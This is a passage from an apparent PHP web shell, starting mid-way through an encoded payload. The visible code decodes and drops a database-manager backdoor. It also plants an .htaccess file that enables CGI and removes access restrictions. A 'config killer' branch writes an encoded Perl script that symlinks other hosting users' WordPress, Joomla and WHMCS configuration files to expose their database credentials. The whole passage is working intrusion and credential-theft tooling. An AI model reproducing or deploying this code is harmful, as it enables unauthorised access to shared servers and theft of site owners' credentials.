3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXREdGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3REdaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
- $write = fwrite ($f2 ,base64_decode($sml_db));
- if ($write)
- {@chmod('angel/db.php',0755);}
- echo "</br></br><center><b>GO TO : <a href='angel/db.php' target='_blank'>[+] MYSQL MANAGER [+]</a></center></br>";
- }
- }
- # x=ckperl
- elseif(isset($_GET['x']) && ($_GET['x'] == 'ckperl')) {
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ PERL</span> <span class='b8'>CONFIG KILLER ]:=O</span></b></nobr><br/><br/> ";
- echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='image/anu.pl' target='_blank'>[+] HERE [+]</a></center></span></br>";
- if(!is_dir('image')){
- $mk = @mkdir('image',0777);
- $c = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n AddHandler cgi-script .pl \n Require None \n Satisfy Any";
- $f =@fopen ('image/.htaccess','w');
- @fwrite($f , $c);
- $f2 =@fopen ('image/anu.pl','w');
- $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+WytdIENPTkZJRyBQRVJMIFsrXTwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ3ZiLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLidhbnUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ2FudS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jYy9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nYW51LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLidhbnUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ2FudS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nd3AudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJ3dwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsJGtvbGEuJ3dwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nam9vbWxhLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLidqb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nam9vbWxhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL